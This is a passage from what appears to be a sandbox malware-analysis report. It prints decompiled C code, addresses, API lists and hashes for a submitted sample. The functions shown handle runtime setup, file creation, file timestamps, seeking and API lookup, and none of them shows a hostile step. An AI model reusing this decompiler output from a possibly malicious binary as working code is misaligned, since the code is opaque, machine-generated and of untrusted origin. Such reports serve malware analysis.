				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E00A1F5F0(_t87, _t89 + 0x2208, 0, 0x40);
				E00A1F5F0(_t87, _t89 + 0x2248, 0, 0x34);
				E00A1F5F0(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}














                                                        0x00a013a2
                                                        0x00a013a2
                                                        0x00a013a2
                                                        0x00a013a2
                                                        0x00a013a7
                                                        0x00a013b0
                                                        0x00a013b2
                                                        0x00a013b5
                                                        0x00a013bc
                                                        0x00a013c8
                                                        0x00a013cb
                                                        0x00a013d6
                                                        0x00a013da
                                                        0x00a013e5
                                                        0x00a013eb
                                                        0x00a013f1
                                                        0x00a013fc
                                                        0x00a01404
                                                        0x00a01408
                                                        0x00a0140b
                                                        0x00a01411
                                                        0x00a01417
                                                        0x00a01419
                                                        0x00a0143e
                                                        0x00a0141b
                                                        0x00a01420
                                                        0x00a01426
                                                        0x00a01429
                                                        0x00a0142f
                                                        0x00a0143a
                                                        0x00a01431
                                                        0x00a01433
                                                        0x00a01433
                                                        0x00a0142f
                                                        0x00a01441
                                                        0x00a0144d
                                                        0x00a01454
                                                        0x00a0145b
                                                        0x00a01464
                                                        0x00a0146f
                                                        0x00a01479
                                                        0x00a0147f
                                                        0x00a01485
                                                        0x00a0148b
                                                        0x00a01491
                                                        0x00a01497
                                                        0x00a0149d
                                                        0x00a014a4
                                                        0x00a014aa
                                                        0x00a014b0
                                                        0x00a014b6
                                                        0x00a014bc
                                                        0x00a014c2
                                                        0x00a014d1
                                                        0x00a014e0
                                                        0x00a014eb
                                                        0x00a014f3
                                                        0x00a014f9
                                                        0x00a014ff
                                                        0x00a01505
                                                        0x00a0150b
                                                        0x00a01511
                                                        0x00a01517
                                                        0x00a01520
                                                        0x00a01526
                                                        0x00a0152c
                                                        0x00a01534
                                                        0x00a0153e

                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00A013A7
                                                          • Part of subcall function 00A05FD7: __EH_prolog.LIBCMT ref: 00A05FDC
                                                          • Part of subcall function 00A0CA2B: __EH_prolog.LIBCMT ref: 00A0CA30
                                                          • Part of subcall function 00A0CA2B: new.LIBCMT ref: 00A0CA73
                                                          • Part of subcall function 00A0CA2B: new.LIBCMT ref: 00A0CA97
                                                        • new.LIBCMT ref: 00A01420
                                                          • Part of subcall function 00A0B26D: __EH_prolog.LIBCMT ref: 00A0B272
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: 8397414eec724c1b6e78875a0aca477868186f22aee69e74de2affbf63fe1ff7
                                                        • Instruction ID: e40cba82082cc47bde7d668cc270315dc3c28e25fdb11c9bde8ffade37cdb4dc
                                                        • Opcode Fuzzy Hash: 8397414eec724c1b6e78875a0aca477868186f22aee69e74de2affbf63fe1ff7
                                                        • Instruction Fuzzy Hash: FD4178B0905B449EE724DF798585AE7FBE6FF18310F504A2ED5EE83282DB322554CB11
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A2B497 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 95%
                                                        			E00A2B497(signed int __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, char _a8) {
				char _v8;
				char _v16;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t31;
				signed int _t36;
				char _t40;
				intOrPtr _t44;
				char _t45;
				signed int _t51;
				void* _t64;
				void* _t70;
				signed int _t75;
				void* _t81;

				_t81 = __eflags;
				_v8 = E00A292B5(__ebx, __ecx, __edx);
				E00A2B5BE(__ebx, __ecx, __edx, _t81);
				_t31 = E00A2B22B(_t81, _a4);
				_v16 = _t31;
				_t57 =  *(_v8 + 0x48);
				if(_t31 ==  *((intOrPtr*)( *(_v8 + 0x48) + 4))) {
					return 0;
				}
				_push(__ebx);
				_t70 = E00A28838(_t57, 0x220);
				_t51 = __ebx | 0xffffffff;
				__eflags = _t70;
				if(__eflags == 0) {
					L5:
					_t75 = _t51;
					goto L6;
				} else {
					_t70 = memcpy(_t70,  *(_v8 + 0x48), 0x88 << 2);
					 *_t70 =  *_t70 & 0x00000000; // executed
					_t36 = E00A2B660(_t51, _t70,  *(_v8 + 0x48), __eflags, _v16, _t70); // executed
					_t75 = _t36;
					__eflags = _t75 - _t51;
					if(_t75 != _t51) {
						__eflags = _a8;
						if(_a8 == 0) {
							E00A285EF();
						}
						asm("lock xadd [eax], ebx");
						__eflags = _t51 == 1;
						if(_t51 == 1) {
							_t45 = _v8;
							__eflags =  *((intOrPtr*)(_t45 + 0x48)) - 0xa3eb20;
							if( *((intOrPtr*)(_t45 + 0x48)) != 0xa3eb20) {
								E00A287FE( *((intOrPtr*)(_t45 + 0x48)));
							}
						}
						 *_t70 = 1;
						_t64 = _t70;
						_t70 = 0;
						 *(_v8 + 0x48) = _t64;
						_t40 = _v8;
						__eflags =  *(_t40 + 0x350) & 0x00000002;
						if(( *(_t40 + 0x350) & 0x00000002) == 0) {
							__eflags =  *0xa3eda0 & 0x00000001;
							if(( *0xa3eda0 & 0x00000001) == 0) {
								_v16 =  &_v8;
								E00A2B101(5,  &_v16);
								__eflags = _a8;
								if(_a8 != 0) {
									_t44 =  *0xa3ed40; // 0x32e23a8
									 *0xa3e814 = _t44;
								}
							}
						}
						L6:
						E00A287FE(_t70);
						return _t75;
					} else {
						 *((intOrPtr*)(E00A28C7A())) = 0x16;
						goto L5;
					}
				}
			}


















                                                        0x00a2b497
                                                        0x00a2b4a4
                                                        0x00a2b4a7
                                                        0x00a2b4af
                                                        0x00a2b4b8
                                                        0x00a2b4bb
                                                        0x00a2b4c1
                                                        0x00000000
                                                        0x00a2b4c3
                                                        0x00a2b4c7
                                                        0x00a2b4d4
                                                        0x00a2b4d6
                                                        0x00a2b4da
                                                        0x00a2b4dc
                                                        0x00a2b50c
                                                        0x00a2b50c
                                                        0x00000000
                                                        0x00a2b4de
                                                        0x00a2b4eb
                                                        0x00a2b4f1
                                                        0x00a2b4f4
                                                        0x00a2b4f9
                                                        0x00a2b4fd
                                                        0x00a2b4ff
                                                        0x00a2b51e
                                                        0x00a2b522
                                                        0x00a2b524
                                                        0x00a2b524
                                                        0x00a2b52f
                                                        0x00a2b533
                                                        0x00a2b534
                                                        0x00a2b536
                                                        0x00a2b539
                                                        0x00a2b540
                                                        0x00a2b545
                                                        0x00a2b54a
                                                        0x00a2b540
                                                        0x00a2b54b
                                                        0x00a2b551
                                                        0x00a2b556
                                                        0x00a2b558
                                                        0x00a2b55b
                                                        0x00a2b55e
                                                        0x00a2b565
                                                        0x00a2b567
                                                        0x00a2b56e
                                                        0x00a2b573
                                                        0x00a2b57c
                                                        0x00a2b581
                                                        0x00a2b587
                                                        0x00a2b589
                                                        0x00a2b58e
                                                        0x00a2b58e
                                                        0x00a2b587
                                                        0x00a2b56e
                                                        0x00a2b50e
                                                        0x00a2b50f
                                                        0x00000000
                                                        0x00a2b501
                                                        0x00a2b506
                                                        0x00000000
                                                        0x00a2b506
                                                        0x00a2b4ff

                                                        APIs
                                                          • Part of subcall function 00A292B5: GetLastError.KERNEL32(?,00A40F50,00A240E4,00A40F50,?,?,00A23B5F,?,?,00A40F50), ref: 00A292B9
                                                          • Part of subcall function 00A292B5: _free.LIBCMT ref: 00A292EC
                                                          • Part of subcall function 00A292B5: SetLastError.KERNEL32(00000000,?,00A40F50), ref: 00A2932D
                                                          • Part of subcall function 00A292B5: _abort.LIBCMT ref: 00A29333
                                                          • Part of subcall function 00A2B5BE: _abort.LIBCMT ref: 00A2B5F0
                                                          • Part of subcall function 00A2B5BE: _free.LIBCMT ref: 00A2B624
                                                          • Part of subcall function 00A2B22B: GetOEMCP.KERNEL32(00000000,?,?,00A2B4B4,?), ref: 00A2B256
                                                        • _free.LIBCMT ref: 00A2B50F
                                                        • _free.LIBCMT ref: 00A2B545
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorLast_abort
                                                        • String ID:
                                                        • API String ID: 2991157371-0
                                                        • Opcode ID: b9c1a27a3d88b1613f6372a7cdbba2a75a0651e88d3d140dbe99679af938783b
                                                        • Instruction ID: 2f28d3d4499e25fd5c1bd126a767c4e742b8b2b327677e70c3d02fd43e1ab7ad
                                                        • Opcode Fuzzy Hash: b9c1a27a3d88b1613f6372a7cdbba2a75a0651e88d3d140dbe99679af938783b
                                                        • Instruction Fuzzy Hash: C0319331914128AFDB10EFACE941BA9B7F5EF45320F2544B9F8059F2A1DB359D41CB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A098BE Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A098BE(void* __ecx, short _a4, WCHAR* _a4104, signed char _a4108) {
				long _v0;
				signed char _t34;
				signed int _t36;
				void* _t37;
				signed char _t46;
				struct _SECURITY_ATTRIBUTES* _t47;
				long _t56;
				void* _t59;
				long _t63;

				E00A1E630();
				_t46 = _a4108;
				_t34 = _t46 >> 0x00000001 & 0x00000001;
				_t59 = __ecx;
				if((_t46 & 0x00000010) != 0 ||  *((char*)(__ecx + 0x22)) != 0) {
					_t63 = 1;
					__eflags = 1;
				} else {
					_t63 = 0;
				}
				 *(_t59 + 0x1c) = _t46;
				_v0 = ((0 | _t34 == 0x00000000) - 0x00000001 & 0x80000000) + 0xc0000000;
				_t36 =  *(E00A0BE6D(_t34, _a4104)) & 0x0000ffff;
				if(_t36 == 0x2e || _t36 == 0x20) {
					if((_t46 & 0x00000020) != 0) {
						goto L8;
					} else {
						 *(_t59 + 4) =  *(_t59 + 4) | 0xffffffff;
						_t47 = 0;
						_t56 = _v0;
					}
				} else {
					L8:
					_t56 = _v0;
					_t47 = 0;
					__eflags = 0;
					_t37 = CreateFileW(_a4104, _t56, _t63, 0, 2, 0, 0); // executed
					 *(_t59 + 4) = _t37;
				}
				if( *(_t59 + 4) == 0xffffffff && E00A0B85C(_a4104,  &_a4, 0x800) != 0) {
					 *(_t59 + 4) = CreateFileW( &_a4, _t56, _t63, _t47, 2, _t47, _t47);
				}
				 *((char*)(_t59 + 0x18)) = 1;
				 *(_t59 + 0xc) = _t47;
				 *(_t59 + 0x10) = _t47;
				return E00A10131(_t59 + 0x24, _a4104, 0x800) & 0xffffff00 |  *(_t59 + 4) != 0xffffffff;
			}












                                                        0x00a098c3
                                                        0x00a098c9
                                                        0x00a098d6
                                                        0x00a098d8
                                                        0x00a098de
                                                        0x00a098ec
                                                        0x00a098ec
                                                        0x00a098e6
                                                        0x00a098e6
                                                        0x00a098e6
                                                        0x00a098f6
                                                        0x00a0990b
                                                        0x00a09914
                                                        0x00a0991a
                                                        0x00a09924
                                                        0x00000000
                                                        0x00a09926
                                                        0x00a09926
                                                        0x00a0992a
                                                        0x00a0992c
                                                        0x00a0992c
                                                        0x00a09932
                                                        0x00a09932
                                                        0x00a09932
                                                        0x00a09936
                                                        0x00a09936
                                                        0x00a09946
                                                        0x00a0994c
                                                        0x00a0994c
                                                        0x00a09953
                                                        0x00a09981
                                                        0x00a09981
                                                        0x00a09993
                                                        0x00a09998
                                                        0x00a0999b
                                                        0x00a099b4

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00A0A07C,?,?,00A07936), ref: 00A09946
                                                        • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00A0A07C,?,?,00A07936), ref: 00A0997B
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 3e1c41b509026a167f9a8b8ec92487a48b0b48590b306a241b680a17efa100fa
                                                        • Instruction ID: 6340f98afac19ba6ac838c0166bc196a730b958042f17816fef7ccd08c19951f
                                                        • Opcode Fuzzy Hash: 3e1c41b509026a167f9a8b8ec92487a48b0b48590b306a241b680a17efa100fa
                                                        • Instruction Fuzzy Hash: CF213771004348AED7308F54DC45BA7B7ECEF497A4F008A2DF5E5822E2C374AC899B61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A09F02 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 84%
                                                        			E00A09F02(void* __ecx, void* __esi, signed int _a4, signed int* _a8, signed int* _a12) {
				void* _v8;
				void* _v16;
				void* _v24;
				signed char _v25;
				signed char _v26;
				int _t34;
				signed char _t49;
				signed int* _t51;
				signed char _t57;
				void* _t58;
				void* _t59;
				signed int* _t60;
				signed int* _t62;

				_t59 = __esi;
				_t58 = __ecx;
				if( *(__ecx + 0x1c) != 0x100 && ( *(__ecx + 0x1c) & 0x00000002) == 0) {
					FlushFileBuffers( *(__ecx + 4));
				}
				_t51 = _a4;
				_t49 = 1;
				if(_t51 == 0 || ( *_t51 | _t51[1]) == 0) {
					_t57 = 0;
				} else {
					_t57 = 1;
				}
				_push(_t59);
				_t60 = _a8;
				_v25 = _t57;
				if(_t60 == 0) {
					L9:
					_v26 = 0;
				} else {
					_v26 = _t49;
					if(( *_t60 | _t60[1]) == 0) {
						goto L9;
					}
				}
				_t62 = _a12;
				if(_t62 == 0 || ( *_t62 | _a4) == 0) {
					_t49 = 0;
				}
				if(_t57 != 0) {
					E00A10EAD(_t51, _t57,  &_v24);
				}
				if(_v26 != 0) {
					E00A10EAD(_t60, _t57,  &_v8);
				}
				if(_t49 != 0) {
					E00A10EAD(_t62, _t57,  &_v16);
				}
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				_t34 = SetFileTime( *(_t58 + 4),  ~(_v26 & 0x000000ff) &  &_v8,  ~(_t49 & 0x000000ff) &  &_v16,  ~(_v25 & 0x000000ff) &  &_v24); // executed
				return _t34;
			}
















                                                        0x00a09f02
                                                        0x00a09f08
                                                        0x00a09f11
                                                        0x00a09f1c
                                                        0x00a09f1c
                                                        0x00a09f22
                                                        0x00a09f28
                                                        0x00a09f2b
                                                        0x00a09f38
                                                        0x00a09f34
                                                        0x00a09f34
                                                        0x00a09f34
                                                        0x00a09f3a
                                                        0x00a09f3b
                                                        0x00a09f3f
                                                        0x00a09f45
                                                        0x00a09f52
                                                        0x00a09f52
                                                        0x00a09f47
                                                        0x00a09f4c
                                                        0x00a09f50
                                                        0x00000000
                                                        0x00000000
                                                        0x00a09f50
                                                        0x00a09f57
                                                        0x00a09f5d
                                                        0x00a09f67
                                                        0x00a09f67
                                                        0x00a09f6b
                                                        0x00a09f72
                                                        0x00a09f72
                                                        0x00a09f7c
                                                        0x00a09f85
                                                        0x00a09f85
                                                        0x00a09f8d
                                                        0x00a09f96
                                                        0x00a09f96
                                                        0x00a09fa6
                                                        0x00a09fb4
                                                        0x00a09fc4
                                                        0x00a09fcc
                                                        0x00a09fd8

                                                        APIs
                                                        • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00A075F1,?,?,?,?), ref: 00A09F1C
                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00A09FCC
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: File$BuffersFlushTime
                                                        • String ID:
                                                        • API String ID: 1392018926-0
                                                        • Opcode ID: ef910a179a44b56e37fc770c533c1c41d3ef1a1335ff0e99af3ccf4dd909ad7d
                                                        • Instruction ID: 55b5108dc0c606cc3e007e3df974a9576987fd1104c88e369d5b42694a10a464
                                                        • Opcode Fuzzy Hash: ef910a179a44b56e37fc770c533c1c41d3ef1a1335ff0e99af3ccf4dd909ad7d
                                                        • Instruction Fuzzy Hash: A121D33115834BABC714DF25D991EABBBE8AF96704F08481DB4D1C71C2C329EA4DDB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A2A768 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        C-Code - Quality: 90%
                                                        			E00A2A768(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				intOrPtr* _t34;

				_t20 = 0xa61630 + _a4 * 4;
				_t27 =  *0xa3e668; // 0xcba178b4
				_t29 = _t28 | 0xffffffff;
				_t33 = _t27 ^  *_t20;
				asm("ror esi, cl");
				if(_t33 == _t29) {
					L14:
					return 0;
				}
				if(_t33 == 0) {
					_t34 = _a12;
					if(_t34 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t29 ^ _t27;
							goto L14;
						}
						_t33 = GetProcAddress(_t13, _a8);
						if(_t33 == 0) {
							_t27 =  *0xa3e668; // 0xcba178b4
							goto L13;
						}
						 *_t20 = E00A23429(_t33);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E00A2A804( *_t34); // executed
						if(_t13 != 0) {
							break;
						}
						_t34 = _t34 + 4;
						if(_t34 != _a16) {
							continue;
						}
						_t27 =  *0xa3e668; // 0xcba178b4
						goto L7;
					}
					_t27 =  *0xa3e668; // 0xcba178b4
					goto L8;
				}
				L2:
				return _t33;
			}










                                                        0x00a2a773
                                                        0x00a2a77c
                                                        0x00a2a782
                                                        0x00a2a78c
                                                        0x00a2a78e
                                                        0x00a2a792
                                                        0x00a2a7fd
                                                        0x00000000
                                                        0x00a2a7fd
                                                        0x00a2a796
                                                        0x00a2a79c
                                                        0x00a2a7a2
                                                        0x00a2a7be
                                                        0x00a2a7be
                                                        0x00a2a7c0
                                                        0x00a2a7c2
                                                        0x00a2a7ed
                                                        0x00a2a7ef
                                                        0x00a2a7f7
                                                        0x00a2a7fb
                                                        0x00000000
                                                        0x00a2a7fb
                                                        0x00a2a7ce
                                                        0x00a2a7d2
                                                        0x00a2a7e7
                                                        0x00000000
                                                        0x00a2a7e7
                                                        0x00a2a7db
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2a7a4
                                                        0x00a2a7a4
                                                        0x00a2a7a6
                                                        0x00a2a7ae
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2a7b0
                                                        0x00a2a7b6
                                                        0x00000000
                                                        0x00000000
                                                        0x00a2a7b8
                                                        0x00000000
                                                        0x00a2a7b8
                                                        0x00a2a7df
                                                        0x00000000
                                                        0x00a2a7df
                                                        0x00a2a798
                                                        0x00000000

                                                        APIs
                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00A2A7C8
                                                        • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A2A7D5
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AddressProc__crt_fast_encode_pointer
                                                        • String ID:
                                                        • API String ID: 2279764990-0
                                                        • Opcode ID: a66c0c2ea55fa9e8b81ac49f54c7a730672e894edc848f66518cec015cbd4872
                                                        • Instruction ID: 4160da1b2f4c459a1762679cccdf630bc3690236bd3d9def27b55dc8d542c904
                                                        • Opcode Fuzzy Hash: a66c0c2ea55fa9e8b81ac49f54c7a730672e894edc848f66518cec015cbd4872
                                                        • Instruction Fuzzy Hash: 1311E337A102319F9F26DF6CFC4189A73B69B943207164231FC15EB284D730DC4286D6
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A09CF9 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 69%
                                                        			E00A09CF9(void* __esi) {
				long _t14;
				void* _t17;
				long _t21;
				intOrPtr* _t23;
				long _t24;
				void* _t28;
				long _t30;
				void* _t32;
				intOrPtr* _t35;
				void* _t36;
				long _t38;

				_t32 = __esi;
				_t35 = _t23;
				if( *(_t35 + 4) == 0xffffffff) {
					L13:
					return 1;
				}
				_t21 =  *(_t36 + 0x14);
				_t30 =  *(_t36 + 0x14);
				_t38 = _t21;
				if(_t38 > 0 || _t38 >= 0 && _t30 >= 0) {
					_t24 =  *(_t36 + 0x1c);
				} else {
					_t24 =  *(_t36 + 0x1c);
					if(_t24 != 0) {
						if(_t24 != 1) {
							_t17 = E00A09A85(_t28);
						} else {
							 *0xa33260(_t32);
							_t17 =  *((intOrPtr*)( *((intOrPtr*)( *_t35 + 0x14))))();
						}
						_t30 = _t30 + _t17;
						asm("adc ebx, edx");
						_t24 = 0;
					}
				}
				 *(_t36 + 0xc) = _t21;
				_t14 = SetFilePointer( *(_t35 + 4), _t30, _t36 + 0x10, _t24); // executed
				if(_t14 != 0xffffffff || GetLastError() == 0) {
					goto L13;
				} else {
					return 0;
				}
			}














                                                        0x00a09cf9
                                                        0x00a09cfb
                                                        0x00a09d01
                                                        0x00a09d7b
                                                        0x00000000
                                                        0x00a09d7b
                                                        0x00a09d04
                                                        0x00a09d09
                                                        0x00a09d0d
                                                        0x00a09d0f
                                                        0x00a09d49
                                                        0x00a09d17
                                                        0x00a09d17
                                                        0x00a09d1d
                                                        0x00a09d22
                                                        0x00a09d3c
                                                        0x00a09d24
                                                        0x00a09d2d
                                                        0x00a09d35
                                                        0x00a09d37
                                                        0x00a09d41
                                                        0x00a09d43
                                                        0x00a09d45
                                                        0x00a09d45
                                                        0x00a09d1d
                                                        0x00a09d4f
                                                        0x00a09d60
                                                        0x00a09d6b
                                                        0x00000000
                                                        0x00a09d77
                                                        0x00000000
                                                        0x00a09d77

                                                        APIs
                                                        • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00A09CD5,?,?,00000000,?,?,00A08F2A,?), ref: 00A09D60
                                                        • GetLastError.KERNEL32 ref: 00A09D6D
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastPointer
                                                        • String ID:
                                                        • API String ID: 2976181284-0
                                                        • Opcode ID: d97fac0d2308ac5e64b76482f090a15b21b3eba71f043bb7d237ab07a9cc492e
                                                        • Instruction ID: 3a27ceb9d1cdaa2026adf80bacc9afae706e68d467a781add3b43e618e99b986
                                                        • Opcode Fuzzy Hash: d97fac0d2308ac5e64b76482f090a15b21b3eba71f043bb7d237ab07a9cc492e
                                                        • Instruction Fuzzy Hash: AA012B323442099FCB08CF66BC9457FB369AF91721B10452EF813872D2DB34DC058721
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A09FE0 Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 89%
                                                        			E00A09FE0() {
				long _v4;
				void* __ecx;
				void* __ebp;
				long _t12;
				signed int _t14;
				signed int _t21;
				signed int _t22;
				void* _t23;
				long _t32;
				void* _t34;

				_t34 = _t23;
